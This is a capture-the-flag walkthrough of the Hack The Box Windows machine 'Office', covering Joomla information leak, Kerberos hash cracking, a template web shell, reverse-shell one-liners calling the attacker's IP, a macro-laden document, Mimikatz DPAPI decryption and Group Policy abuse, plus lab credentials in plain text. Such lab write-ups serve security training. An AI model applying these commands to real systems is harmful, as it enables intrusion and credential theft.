HTB | Office
Last updated
Last updated
This is a Windows box. You can find it here.
Joomla Web Service Abuse
CVE-2023-23752
WireShark Packet Filtering
RunasC
LibreOffice Registry Security
DPAPI
Abusing MS-BKRP (BackupKey Remote Protocol) for Password Decryption
GPO Abuse (via SharpGPOAbuse.exe)
IP: 10.10.11.3
from this, we can say there are
office.htb
dc.office.htb
hostmaster.office.htb
Let's add this to /etc/hosts
Let's try zone transfer, but zone transfer is not possible
nothing interesting was found on ldapsearch
netexe confirms the host and domain
not able to perform any unauthenticated enumeration
Let's visit port 80
Let's visit /robots.txt
The website is on Joomla We can find its version at http://office.htb/administrator/manifests/files/joomla.xml
It is version 4.2.7
Let's look for an exploit
I found the CVE-2023-23752, and according to the blog post, CVE-2023-23752 is an authentication bypass resulting in an information leak. We can do this by curl -v http://office.htb/api/index.php/v1/config/application?public=true
or visiting the webpage with the URL
from this, we found the password H0lOgrams4reTakIng0Ver754! That password was not working anywhere
Since we have a password let's use kerbrute to find the username
now we have a username list and password we can password-spray
There’s a hit on dwolfe. No matches on WinRM:
found pcap file in SOC Analysis share
I will download the file and open it in Wireshark for analysis
Open Statictic -> Endpoints
Looks like 10.250.0.0/24 is the internal network.
most traffic is from 10.250.0.30
Now let's analyse the conversation (Statistic -> Conversation) here we can see the conversation between 10.250.0.41 and 10.250.0.30 over port 88. This might be a Kerberos authentication conversation
We can see two AS-REQ requests from 10.250.0.41
The first request does not have any data but the second request has
This packet includes a timestamp encrypted by the tstark user.
I found this article which shows how to Get Passwords From Kerberos Pre-Authentication Packets
I will now create the hash
now I will use hashcat to crack the hash
This password only worked for smb but we didn't find anything on the shares
This password worked on Joomla website with the administrator username
I’ll click on System and select “Site Templates”, and then “Cassiopeia Details and Files”. I’ll edit index.php, and after making a change in a comment to make sure I have permissions (I do)
Now I will add a shell(refer to revshell.com) in index.php.
and it works
I tried php -r '$sock=fsockopen("10.10.14.5",1234);system("sh<&3 >&3 2>&3");' but the connection was getting close as soon it gets connected
Now I'll try to get the shell as tstark directly and for that I will use RunasCs. I’ll host RunasCs on my Python webserver, and download it to programdata:
We can cross-check that r.exe is copied
I’ll send ?cmd=C:\programdata\r.exe tstark playboy69 cmd.exe -r 10.10.14.5:1234, and I get a shell:
found user.txt
Let's look at the what privileges and groups tstark users is part of
Here we can see tstark is a part of OFFICE\Registry Editors group
That’s a custom group for Office, but it seems to imply that TStark can edit at least parts of the registry.
In C:\xampp\apache\conf\httpd.conf, I’ll find the setup of the virtual host for this site:
The applications directory is empty, but it is owned by the PPotts user, and web_account has access to write to it:
since port 8083 is hosted internally I will upload chisel to the office box
And start the server on my host. Now I’ll connect back:
Now i can visit http://127.0.0.1:8083
There is a page /resume.php where we can upload resume
I tried uploading test.txt but got an error
If I try with the allowed extension it gets uploaded, Let's try the test.odt
This wiki page documents the MacroSecurityLevel registry key that shows the current settings:
Based on this page value 3 is very high, so we have to trim it down to 0
ACL on this registry shows that "Registry Editor" have full control
I'll update the value to 0
I will use msfconsole to generate the .odt file
Now I will run and upload the msf.odt on the website
We have to check the MacrSecurity value because it gets set back to 3 after some time.
and after some time we have meterpreter shell
and we are ppots
cmdkey /list will show us any saved cred on the system with the current account
Here we can see user hhogan's password
and hhogan is a GPO Manager
The system level cred are stored by DPAPI here
the master key for these are stored here
The challenge is that the master key is encrypted with the user’s password, and I don’t have it. Fortunately, there’s a blog post from SpecterOps that shows how to decrypt without the password, using an RPC called MS-BKRP (BackupKey Remote Protocol). To abuse this I’ll use the /rpc flag in Mimikatz.
Let's upload mimikatz to the box
Now we have to get the key
we have the key at the end. Now Let's try this key on all three creds
The first one is for MyUser
second is for hhogan
and 3rd one give error
Now we have hhogan's cred, Let's winrm using that
We can smb and winrm using the cred
now use evil-winrm to get shell
Since hhogan is a GPO Manager
We can look for GPO
Now to abuse GPO we can use SharepGPOAbuse I have downloaded the exe from this repo
Let's upload the exe
Let's start with the first GPO,
and it is not writable, Let's try the second one
We were able to abuse the second group policy "Default Domain Policy" to add hhogan as new local admin.
This doesn’t take effect until the GPO refreshes. HHogan has permission to run gpupdate /force which will make that happen now:
and hhogan is the administrator
after reconnecting I was able to get root.txt
